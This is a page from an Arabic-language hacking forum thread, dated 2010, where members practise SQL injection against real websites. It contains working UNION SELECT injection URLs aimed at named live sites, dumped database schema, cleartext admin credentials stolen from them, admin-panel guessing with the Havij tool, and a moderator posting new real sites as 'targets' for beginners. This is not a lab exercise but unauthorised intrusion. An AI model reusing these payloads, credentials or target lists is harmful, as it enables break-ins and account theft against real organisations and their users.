:: vBspiders Professional Network ::
صفحة 7 من 28 « الأولى 56 7 8917 الأخيرة »
عرض 40 مشاركات من هذا الموضوع لكل صفحة

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/f133.html)
-   -   غرفة حقن قواعد البيانات {غرفة Sql } (http://www.vbspiders.com/vb/t33334.html)

darkman.dz 08-04-2010 06:28 PM
Syst3m-32
جاري يا بطل

darkman.dz 08-04-2010 06:57 PM
كود:
http://www.talkeetnachamber.org/news.php?id=-158+union+select+1,2,3,version%28%29,5,6,database%28%29,8,9,10,11--
وصلت هنا
الفلترة مانفهت معي مع from
الأمر
from+information_schema.columns

فما الحل راكو شوقتونا

darkman.dz 08-04-2010 07:03 PM
وصلت الحقنة إلى
كود:
http://www.talkeetnachamber.org/news.php?id=-158+union+select+1,2,3,version%28%29,5,6,group_concat%28table_name,0x3a,column_name,0x3a,table_schema%29,8,9,10,11+from+information_schema.columns--
وجاري الزيادة

darkman.dz 08-04-2010 07:12 PM
الحقنة في
كود:
http://www.talkeetnachamber.org/news.php?id=-158+union+select+1,2,3,version%28%29,5,6,group_concat%28table_name,0x3a,column_name,0x3a,table_schema%29,8,9,10,11+from+information_schema.columns+where+table_name=0x7068704d795365617263685f73657474696e6773--
أعمدة الباس
كود:
phpMySearch_settings:DBPassword:talkeetn_db01
phpMySearch_settings:adminPassword:talkeetn_db01
talk_user:pass:talkeetn_db01
الجداول table_name
كود:
phpMySearch_settings:recNo:talkeetn_db01
phpMySearch_settings:DBName:talkeetn_db01
phpMySearch_settings:DBUser:talkeetn_db01
phpMySearch_settings:DBPassword:talkeetn_db01
phpMySearch_settings:DBHost:talkeetn_db01
phpMySearch_settings:ProxyActive:talkeetn_db01
phpMySearch_settings:ProxyHost:talkeetn_db01
phpMySearch_settings:ProxyUser:talkeetn_db01
phpMySearch_settings:DBMainTableName:talkeetn_db01
phpMySearch_settings:DBSettingsTableName:talkeetn_db01
phpMySearch_settings:DBStructTableName:talkeetn_db01
phpMySearch_settings:DBSpiderStateTableName:talkeetn_db01
phpMySearch_settings:DBStatsTableName:talkeetn_db01
phpMySearch_settings:adminLogin:talkeetn_db01
phpMySearch_settings:adminPassword:talkeetn_db01
phpMySearch_settings:parsingExtArr:talkeetn_db01
phpMySearch_settings:startURLs:talkeetn_db01
phpMySearch_settings:urlRetrieveNumber:talkeetn_db01
phpMySearch_settings:StatsActive:talkeetn_db01
phpMySearch_settings:statsOutputNumber:talkeetn_db01
phpMySearch_settings:blackList:talkeetn_db01

وجاري المتابعة بإذن الله

TIKTAKram 08-04-2010 07:14 PM
أوكي بإنتظارك و أي مشكلة أنا هنا :)

و لا تتسرع مرة أخرى لأنه لا توجدأي فلترة

بالتوفيق

darkman.dz 08-04-2010 07:16 PM
نهاية الحقنة
كود:
http://www.talkeetnachamber.org/news.php?id=-158+union+select+1,2,3,version%28%29,5,6,group_concat%28adminLogin,0x3a,adminPassword%29,8,9,10,11+from+phpMySearch_settings--
user = admin
password = admin

darkman.dz 08-04-2010 07:18 PM
جاري تخمين مسار لوحة التحكم أخي
Syst3m-32

darkman.dz 08-04-2010 07:25 PM
للأسف هذا ماخمنه برنامج havij
وما نصح معايا
كود:
Page Found: http://www.talkeetnachamber.org/admin1.html
Page Found: http://www.talkeetnachamber.org/cpanel/
Page Found: http://www.talkeetnachamber.org/cpanel_file/

Master vbspiders 08-04-2010 08:01 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة Syst3m-32 (المشاركة 186858)


ما بعرف إذ كانت الثغرة مرقعة أو شو ! لكن هذا الموقع لم أستطع حقنه

يا غالي أنت المشرف على هذا الموضوع لازم تضع مواقع ( هدف ) أنت حقنته من قبل

لا تقم بوضع موقع مستحيل حقنه ( لو كان صعب عادي )

لأنو هكذا المبتدئين راح يكرهوا الحقن بسرعة و يملوا منه يا غالي

إن شاء الله تتقبل رأيي و هذا هدف هدية لك :) :

كود:
http://www.talkeetnachamber.org/news.php?id=158
من يا ترى لي يحقنه الأول ؟؟ هو سهل بس يبغى شوي ذكاء :)

و أي مساعدة أنا هنا

بالتوفيق
[align=center]الثغرة تم ترقيعها يا غالي
+
كلامك على عيني وعلى راسي
بس انا فعلا حقنت الموقع قبل ما وضعتو على قائمة الاهداف الجديدة
وهاي معلومات الادمن
UserName : alseadi
Password : wfahad12

شكرا على المشاركة معانا وننتظر حقن الهدف الجديد..
تحياتي

[/align]

Master vbspiders 08-04-2010 08:18 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة ooooo_darkman_ooooo (المشاركة 186922)
نهاية الحقنة
كود:
http://www.talkeetnachamber.org/news.php?id=-158+union+select+1,2,3,version%28%29,5,6,group_concat%28adminLogin,0x3a,adminPassword%29,8,9,10,11+from+phpMySearch_settings--
user = admin
password = admin
شغل حلو
^_^
معليش الموقع الثاني بنلقي لوحة التحكم باذن الله
تحياتي

Master vbspiders 08-04-2010 08:24 PM
[align=center]هههه جابها احد الاعضاء
الاستغلال من الاخ karim_topten

كود PHP:
http://www.araob.com/news.php?page=0&dept=-7%20union%20select%201,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11,12,13,14,15%20from%20araobcom_news.members-- 
بطل والله
تحياتي

darkman.dz 08-04-2010 08:29 PM
أين المواقع الأخرى أخي
Master vbspiders

Master vbspiders 08-04-2010 08:34 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة ooooo_darkman_ooooo (المشاركة 186978)
أين المواقع الأخرى أخي
Master vbspiders
من عيوني خويا الغالي
جاري البحث
ثواني بس...
تحياتي

TIKTAKram 08-04-2010 09:43 PM
أحسنت عملا أخي ooooo_darkman_ooooo

حقنة كاملة و عمل رائع

بالتوفيق و بالنسبة للوحة نفس النتائج

يعني ممكن صاحب الموقع مغيره

المهم...! في إنتظار المواقع و لو مش موجود أنا هنا

فقط عشان أترك الأعضاء يستفدوا

بالتوفيق

Master vbspiders 08-04-2010 10:16 PM
[align=center]اسف على التاخير
هذا الهدف الجديد : http://www.cnet.org.uk/news1.php?ID=60
الهدف سهل هالمرة...
بالتوفيق
تحياتي




[/align]


الساعة الآن 02:18 PM
صفحة 7 من 28 « الأولى 56 7 8917 الأخيرة »
عرض 40 مشاركات من هذا الموضوع لكل صفحة


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0